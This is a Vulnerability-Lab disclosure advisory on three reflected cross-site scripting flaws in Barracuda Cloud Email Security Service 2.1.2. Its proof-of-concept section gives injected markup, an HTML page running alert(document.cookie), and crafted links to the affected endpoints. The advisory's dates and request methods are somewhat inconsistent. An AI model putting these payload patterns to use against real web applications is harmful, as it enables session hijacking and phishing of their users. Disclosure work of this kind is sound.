Document Title:
===============
Barracuda Cloud ESS 2.x - Multiple XSS Web Vulnerabilities


Date:
=====
2018-07-22


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=742

Barracuda Networks Security ID: BNSEC-671


VL-ID:
=====
742


Common Vulnerability Scoring System:
====================================
4.4


Vulnerability Class:
====================
Cross Site Scripting - Non Persistent


Introduction:
=============
The Barracuda Email Security Service is a comprehensive and affordable cloud-based email security service that protects both 
inbound and outbound email against the latest spam, viruses, worms, phishing and denial of service attacks. Barracuda Email 
Security Service also includes email encryption and Data Loss Prevention features. The Barracuda Email Security Service 
leverages advanced security technologies from the industry-leading Barracuda Spam & Virus Firewall and features rich multiple 
cloud-based protection:

    Rate control and Denial of Service (DoS) protection
    Reputation-based blocking from known spam and malware sources
    Anti-virus, featuring the patent-pending Barracuda Anti-Virus Supercomputing Grid
    Anti-phishing, using the Barracuda Anti-Fraud Intelligence
    Protection against spam, phishing, fraud and emails with other malicious intent
    Custom sender/recipient policy

(Copy of the Vendor Homepage: https://www.barracudanetworks.com/ns/products/bess_overview.php )


Abstract:
=========
The vulnerability laboratory core research team discovered multiple cross site vulnerabilities in the official cloud-based 
Barracuda Networks Email Security v2.1.2 appliance application service.


Report-Timeline:
================
2017-07-23: Public Disclosure (Vulnerability Laboratory)


Status:
========
Published


Affected Products:
==================
Barracuda Networks
Product: EMail Security Service Application Appliance (Cloud-Based) v2.1.2

Barracuda Networks
Product: Cloud Control Center v2.1.2


Exploitation-Technique:
=======================
Remote


Severity:
=========
Medium


Details:
========
Multiple non persistent input validation vulnerabilities has been discovered in the cloud-based Barracuda Email Security v2.1.2 Appliance Application Service.
The client-side cross site scripting vulnerability allow remote attackers to inject own malicious script codes to client-sude application to browser requests.

1.1
The first vulnerability is located in the `domain manager module - remove domain` function when processing to request the invalid exception-handling 
redisplay message (Confirmation required) form context. The application does not encode the displayed message context with the invalid value of the 
exception-handling. The application executes the script code on the client-side in the main error message body context. The attack vector of the issue 
is client-side (non-persistent) and the request method to inject is POST.

1.2
The second vulnerability is located in the `custom_rbls` parameter of the `bulk_edit` module context. The vulnerability allows to inject own script codes 
to the client-side through the vulnerable `bulk_edit` form web context. The script code execution takes place in the bulk_edit form next to the custom_rbls 
parameter input. The attack vector of the issue is client-side (non-persistent) and the request method to inject is POST.

1.3
The third vulnerability is located in the `attachment_filters` of the `bulk_edit` form module. The vulnerability allows to inject own script codes 
to the client-side through the vulnerable `bulk_edit` form web context. The script code execution takes place in the bulk_edit form next to the 
attachment_filters parameter input. The attack vector of the issue is client-side (non-persistent) and the request method to inject is POST.

Exploitation of the three cross site scripting vulnerabilities does not a privileged application user account but low or medium user interaction. 
Successful exploitation of the client-side vulnerabilities results in session hijacking (customer/admin), client-side phishing, client-side external redirects to 
malicious source and client-side manipulated of affected or connected module context.

Request Method(s):
[+] POST
[+] GET
[+] GET

Vulnerable Module(s):
[+] Domains Manager - Domains - Remove Domains Function
[+] Inbound Settings  - Custom RBLs
[+] Message - attachment_filters

Vulnerable Parameter(s):
[+] remove_domain - ID+
[+] list custom_rbls
[+] list attachment_filters


Proof of Concept:
=================
The client side input validation vulnerabilities can be exploited by remote attackers without privileged user account and with low or medium user interaction. 
For security demonstration or to reproduce the multiple security vulnerabilities follow the provided information and steps below to continue.


PoC: Exploitation
<html>
<head><body>
<title>Barracuda Cloud ESS 2.x - PoC Multiple Cross Site Vulnerabilities</title>
<img src="https://ess.localhost:1338/settings/bulk_edit/attachment_filters%22" onload=alert(document.cookie)></img>
<img src="https://ess.localhost:1338/settings/bulk_edit/custom_rbls%22" onload=alert(document.cookie)></img>
<img src="https://ess.localhost:1338/domains/remove_domain/2" onload=alert(document.cookie)></img>
</body></head>
<html>


1.1 PoC: Domains Manager - Domains - Remove Domains Function - ID + Script Code - Invalid Exception-Handling - Display Script Code to Bypass Filter Check

<div id="page-hd">
  <h2>Confirmation required</h2>
</div>
<div style="position: absolute; top: 86px; left: 0px; right: 0px; bottom: 0px; overflow: auto;" id="ess-content">  
<form method="post" 
action="/domains/remove_domain/SCRIPT>"> <[NON-PERSISTENT SCRIPT CODE INJECTION/EXECUTION!]"> 
>"<script>[removed]=true;<"> <[NON-PERSISTENT SCRIPT CODE INJECTION/EXECUTION!]>
<p>Are you sure you want to delete this domain? Deleting a domain will remove all associated settings and verification status.</p>
<p>

PoC: Link
https://ess.localhost:1338/domains/remove_domain/4[ID+][NON-PERSISTENT SCRIPT CODE INJECTION!];%22%3E%20%3Ciframe%20src=http://vuln-lab.com%3E


1.2 PoC: Inbound Settings  - Custom RBLs

<p>Invalid bulk edit list custom_rbls"><iframe src="custom_rbls-[NON-PERSISTENT SCRIPT CODE EXECUTION!]" onload="alert("vl")" <<="" p="">
    <p><a href="http://ess.barracudanetworks.com/settings" 
class="btn"><span><span>  OK 
 </span></span></a></p>
  </div>
</div> <!-- ess-container -->

PoC: Link
https://ess.localhost:1338/settings/bulk_edit/custom_rbls%22%3E[NON-PERSISTENT SCRIPT CODE INJECTION!]


1.3 PoC: Message - Attachment_Filters

<p>Invalid bulk edit list attachment_filters"><iframe src="attachment-filters_bedit-Dateien/a.htm" [NON-PERSISTENT SCRIPT CODE EXECUTION!];)" <<="" p="">
  <p><a href="http://ess.barracudanetworks.com/settings" 
class="btn"><span><span>  OK 
 </span></span></a></p>
  </div>

PoC: Link
https://ess.localhost:1338/settings/bulk_edit/attachment_filters%22[NON-PERSISTENT SCRIPT CODE INJECTION!]


References:
https://ess.localhost:1338/domains/remove_domain
https://ess.localhost:1338/settings/bulk_edit/custom_rbls
https://ess.localhost:1338/settings/bulk_edit/attachment_filters


Solution:
=========
The issue was reported in 2016 Q4. The issue was resolved in 2017 Q1 - Q4. The disclosure process took about 7 month.


Risk:
=====
The security risk of the multiple client-side cross site scripting web vulnerabilities in the cloud ess application are estimated as medium.


Credits:
========
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its 
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface 
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories 
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, 
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. 

Domains:    www.vulnerability-lab.com		- www.vulnerability-db.com					- www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.

				    Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™